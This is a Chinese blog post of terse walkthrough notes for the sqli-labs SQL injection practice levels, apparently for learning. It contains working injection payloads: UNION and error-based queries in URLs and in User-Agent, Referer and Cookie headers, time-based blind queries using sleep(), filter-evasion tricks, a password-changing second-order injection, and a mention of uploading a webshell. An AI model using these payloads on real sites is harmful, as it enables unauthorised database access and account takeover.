sql注入

最新推荐文章于 2024-03-17 12:15:00 发布
最新推荐文章于 2024-03-17 12:15:00 发布
阅读量643 收藏
点赞数
分类专栏: 笔记
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_30365511/article/details/107146807
版权

直接放图

有回显的地方可以插入sql语句,pyload看url

order by 找出3个字段
union select 1,2,3
在这里插入图片描述2,3就是显示位,可以放sql语句,–+为了注释后面语句
例如这个
在这里插入图片描述

在这里插入图片描述
在这里插入图片描述

报错注入三种都试一下paylod里面放sql语句

加粗样式
在这里插入图片描述
第七题传个马,然后。。。。。然后我没菜刀
在这里插入图片描述
第八题盲注 就是瞎猜(开个玩笑)通过页面是否正确返回来判断 例如

在这里插入图片描述
在这里插入图片描述

后面的逻辑改成sql语句盲注

第九题,显示一样,加一个sleep函数区分是否执行和第八题一样
第十题,双引号盲注,剩下的和第九题一样
第十一题,抓包改参
莫名其妙抓不了包
uname=0’ union select 1,2 --+&passwd=admin&submit=Submit
第十二题,和十一题一样,单引号改双引号
uname=0") union select 1,database() --+ &passwd=admin&submit=Submit
第十三题
在这里插入图片描述
第十四题
在这里插入图片描述
第十五
在这里插入图片描述
十六
sleep函数
在这里插入图片描述
十八
构造User-Agent
payload-header:User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:60.0) Gecko/20100101 Firefox/60.0 ’ or updatexml(1,concat(0x7e,database(),0x7e),1),”,”) #

十九
Referer
Referer: http://localhost/sqli-labs/Less-19/ ’ or updatexml(1,concat(0x7e,database(),0x7e),1),”,”) #
二十
构造cookie
payload-header:Cookie: uname=admin ’ or updatexml(1,concat(0x7e,database(),0x7e),1) #

base64编码

二十一
union联查
Cookie: uname=JykgdW5pb24gc2VsZWN0IDEsMixlbWFpbF9pZCBmcm9tIGVtYWlscyAj=
二十二同上
Cookie: uname=IiB1bmlvbiBzZWxlY3QgMSwyLGVtYWlsX2lkIGZyb20gZW1haWxzICM=
二十三
由于bun掉了注释符构造or ‘1’='1来补全sql语句数字2是回显点
在这里插入图片描述
二十四
任意修改
先注册然后修改
UPDATE users SET PASSWORD=’666666’ where username=’ghost’ #’ and password=’123456’
把123456改为666666
二十五
盲注双写绕过
在这里插入图片描述
二十六
5是回显点,用%A0替代空格使用,用&&(%26%26)替代AND使用
在这里插入图片描述
二十七
大小写绕过
二十八
在这里插入图片描述
29
不会

宽字节注入

32
在这里插入图片描述
在这里插入图片描述
35
在这里插入图片描述
36
在这里插入图片描述
37
在这里插入图片描述

堆叠注入

38
在这里插入图片描述
39
在这里插入图片描述
40
在这里插入图片描述
41
盲注
48
在这里插入图片描述
49
同上加一个sleep
50
在这里插入图片描述
51
在这里插入图片描述
52
同50
53
同51
62
sleep
在这里插入图片描述
?id=1%27)and%20If(ascii(substr((select%20group_concat(table_name)%20from%20information_schema.tables%20where%20table_schema=%27challenges%27),1,1))=79,0,sleep(5))–+
63同上
单引号
64同上
双括号
65
?id=1%22)and%20If(ascii(substr((select%20group_concat(table_name)%20from%20information_schema.tables%20where%20table_schema=%27challenges%27),1,1))=79,0,sleep(10))–+
在这里插入图片描述

qq_30365511
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
sql注入详解
m0_67392811的博客
06-12 5505
目录前言? ?一、漏洞原因分析二、漏洞危害三、sql注入防范四、如何挖掘sql注入漏洞五、常见的注入手法联合查询(union注入)报错注入基于布尔的盲注基于时间的盲注HTTP头注入宽字节注入堆叠查询二阶注入六、sql注入getshell的几种方式结构化查询语言(Structured Query Language,缩写:SQL),是一种特殊的编程语言,用于数据库中的标准数据查询语言。SQL注入(SQL Injection)是一种常见的Web安全漏洞,主要形成的原因是在数据交互中,前端的数据传入到后台处理时,没
sql注入攻击流量情况
07-18
sql注入攻击流量情况
SQL注入
qq_46429177的博客
01-15 136
SQL注入简介 SQL注入是网站存在最多也是最简单的漏洞,主要原因是程序员在开发用户和数据库交互的系统时没有对用户输入的字符串进行过滤,转义,限制或处理不严谨,导致用户可以通过输入精心构造的字符串去非法获取到数据库中的数据。本文以免费开源数据库MySQL为例,看懂本文需要了解基本SQL语句。 SQL注入条件 1.参数是用户可控的 2.参数被带入数据库中进行查询 SQL注入的危害 1.数据库信息泄露 2.获取webshell 3.网页篡改 4.网站挂马 5.获取系统权限 6.万能密码 7.文件读取 等 SQL
【万字长文】SQL注入(非常详细)零基础入门到精通,收藏这一篇就够了
Libra1313的博客
03-17 2330
之前一直有粉丝朋友,在挖漏洞过程中使用到SQL注入,希望大白给他讲解一些的SQL注入,今天大白也特地给粉丝朋友安排好了SQL注入攻击方式根据应用程序处理数据库返回内容的不同,可以分为可显注入、报错注入和盲注。
SQL注入详解(全网最全,万字长文)
热门推荐
m0_56691564的博客
10-23 3万+
一些概念:SQL:用于数据库中的标准数据查询语言。 web分为前端和后端,前端负责进行展示,后端负责处理来自前端的请求并提供前端展示的资源。而数据库就是存储资源的地方。而服务器获取数据的方法就是使用SQL语句进行查询获取。
pangolinsdl—sql注入工具
06-20
pangolinsdl—sql注入工具 很好用的sql注入工具 界面简洁好用 使用方便
超级sql注入工具
11-02
超级SQL注入工具(SSQLInjection)是一款基于HTTP协议自组包的SQL注入工具,支持出现在HTTP协议任意位置的SQL注入,支持各种类型的SQL注入,支持HTTPS模式注入。 超级SQL注入工具目前支持Bool型盲注、错误显示注入、...
sql注入网站源码
04-09
挺好的带有sql注入漏洞的asp网站源码,可以自行搭建环境。
SQL 注入天书.pdf
08-06
SQL 注入学习天书
关于sql注入中的 --+
yy
03-14 1万+
--+ sql注入过程中我们经常会碰到 --+这个东西,刚学习的小伙伴可能会对此有疑问,现在就来看看这个--+是一个什么东西。 其实 --在sql语句中起着注释的作用,将后面的语句注释掉,+ 则代表空格。为了更形象的显示,我们以sqli-labs 第一关来说明--+ 1. 在源码中添加语句,将我们执行的语句打印出来 echo "执行的sql语句:"."$sql"."<br>"; 看浏览器,我们输入的--+变成了--空格,此时--后面的语句被注释掉了,不会再...
[极客大挑战 2019]LoveSQL
qq_37301470的博客
11-12 523
万能密码登录成功没有发现flag 判断藏在数据库里 check.php?username=1' or '1'='1&password=123456' or '1'='1 登陆成功返回的密码 7a2d6a8fd56b61a79bba61ee8f5ad02c 直接开始联合注入 check.php?username=1' union select 1,2,3%23&password=1 check.php?username=1' union select 1,2,database()%23&
关于SQL注入的#,--,--+的使用
qq_30889301的博客
05-24 914
了解原理后便知道了–无法使用的原因,是因为–与后面的单引号连接在一起,无法形成有效的mysql语句。原因是url中#号是用来指导浏览器动作的(例如锚点),对服务器端完全无用。所以在注入时我们除了使用–+外,也可以使用–'来完成sql注入语句。在mysql中使用这个语句分析原因,输入后回车显示分号没有闭合。用来和后面的单引号分隔开,将后面的语句注释。有时发现URL中执行sql注入时#号无效。将#号改成url的编码%23就可以了。这里发现+号在语句中变成了空格。所以,HTTP请求中不包括#
【网络安全】SQL注入详解
2301_77160226的博客
04-27 2549
SQL注入是比较常见的网络攻击方式之一,它不是利用操作系统的BUG来实现攻击,而是针对程序员编写时的疏忽,通过SQL语句,实现无账号登录,甚至篡改数据库。
SQL注入总结
qq_46081990的博客
04-22 2936
SQL注入是一种将SQL代码插入或添加到应用(用户)的输入参数中的攻击,之后再将这些参数传递给后台的sql服务器加以解析和执行。由于sql语句本身的多样性,以及可用于构造sql语句的编程方法很多,因此凡是构造sql语句的步骤均存在被攻击的潜在风险。Sql注入的方式主要是直接将代码插入参数中,这些参数会被置入sql命令中加以执行。间接的攻击方式是将恶意代码插入字符串中,之后将这些字符串保存到数据库的数据表中或将其当成元数据。当将存储的字符串置入动态sql命令中时,恶意代码就将被执行。
SQL注入详解
qq_48904485的博客
03-21 1万+
针对SQL注入的攻击行为可描述为通过用户可控参数中注入SQL语法,破坏原有SQL结构,达到编写程序意料之外结果的攻击行为。 其成因可归结为以下两个原理叠加造成: 1、程序编写者在处理程序和数据库交互时,使用字符串凭借的方式构造SQL语句。 2、未对用户可控参数进行足够的过滤便将参数内容拼接进入到SQL语句中。 SQL注入的攻击方式分为:报错注入、布尔盲注 、延时注入、堆叠查询、联合查询 、二次注入等等
Sql注入详解(原理篇)
Naive的博客
09-11 6085
SQL 注入漏洞非常复杂,区分各种数据库类型,提交方法,数据类型等注入,同样此类漏洞是WEB安全中严重的安全漏洞,学习如何利用,挖掘,修复也是很重要的。SQL 注入就是指 Web 应用程序对用户输入的数据合法性没有过滤或者是判断,攻击者可以在Web应用程序中事先定义好的查询语句的结尾上添加额外的SQL语句,在管理员不知情的情况下实现非法操作,以此来实现欺骗数据库服务器执行非授权的任意查询,从而进一步得到相应的数据信息。
sql注入sql注入
最新发布
05-02
SQL注入是一种常见的安全漏洞,它允许攻击者通过在应用程序的输入字段中插入恶意的SQL代码来执行未经授权的数据库操作。攻击者可以利用这个漏洞来绕过身份验证、获取敏感数据、修改数据或者执行其他恶意操作。 为了...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值